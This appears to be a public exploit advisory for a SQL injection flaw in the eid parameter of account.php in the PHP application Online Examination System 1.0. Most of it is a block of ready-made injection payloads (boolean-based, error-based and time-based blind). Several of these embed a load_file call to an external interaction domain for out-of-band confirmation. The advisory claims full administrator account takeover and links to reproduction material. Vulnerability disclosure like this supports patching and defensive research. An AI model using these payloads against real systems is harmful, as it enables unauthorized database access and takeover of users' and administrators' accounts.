Authored by nu11secur1ty

Online Examination System Project version 1.0 suffers from a remote SQL injection vulnerability.

## Title: Online Examination System Project 1.0 SQL - Injections
## Author: nu11secur1ty
## Date: 01.10.2022
## Vendor: https://projectworlds.in/free-projects/php-projects/
## Software: https://projectworlds.in/free-projects/php-projects/online-examination/

## Description:
The eid parameter in `account.php` from Online Examination System 1.0
system appears to be vulnerable to SQL injection attacks.
The payload '+(select
load_file('\0jkmt3q30zv5dtuzpbb7tew1fsll9dz1q4ev1npc.tupaka.netxxi'))+'
was submitted in the eid parameter.
This payload injects a SQL sub-query that calls MySQL's load_file
function with a UNC file path that references a URL on an external
domain.
The application interacted with that domain, indicating that the
injected SQL query was executed.
The attacker can take account control of all accounts plus an
administrator account on this system.
Status: CRITICAL

[+] Payload:

```mysql
---
Parameter: eid (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: q=quiz&step=2&eid=-2303' OR 9254=9254#&n=2&t=2

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
    Payload: q=quiz&step=2&eid=558920ff906b8'+(select
load_file('\0jkmt3q30zv5dtuzpbb7tew1fsll9dz1q4ev1npc.tupaka.netxxi'))+''
OR (SELECT 8851 FROM(SELECT COUNT(*),CONCAT(0x71627a7171,(SELECT
(ELT(8851=8851,1))),0x7162766271,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- enxi&n=2&t=2

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: q=quiz&step=2&eid=558920ff906b8'+(select
load_file('\0jkmt3q30zv5dtuzpbb7tew1fsll9dz1q4ev1npc.tupaka.netxxi'))+''
AND (SELECT 2169 FROM (SELECT(SLEEP(3)))vUQa)-- mkFM&n=2&t=2
---
- admin PWNED:

---
Parameter: eid (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: q=quiz&step=2&eid=-3444' OR 9185=9185#&n=2&t=2

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
    Payload: q=quiz&step=2&eid=558920ff906b8'+(select
load_file('\0jkmt3q30zv5dtuzpbb7tew1fsll9dz1q4ev1npc.tupaka.netxxi'))+''
OR (SELECT 8668 FROM(SELECT COUNT(*),CONCAT(0x716b7a6271,(SELECT
(ELT(8668=8668,1))),0x716a6a7871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- STVX&n=2&t=2

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: q=quiz&step=2&eid=558920ff906b8'+(select
load_file('\0jkmt3q30zv5dtuzpbb7tew1fsll9dz1q4ev1npc.tupaka.netxxi'))+''
AND (SELECT 4208 FROM (SELECT(SLEEP(3)))GPoO)-- AvEf&n=2&t=2
---

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/Projectworlds/2022/Online%20Examination%20System)

## Proof and Exploit:
[href](https://streamable.com/iigqg0)


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>

RELATED ARTICLESMORE FROM AUTHOR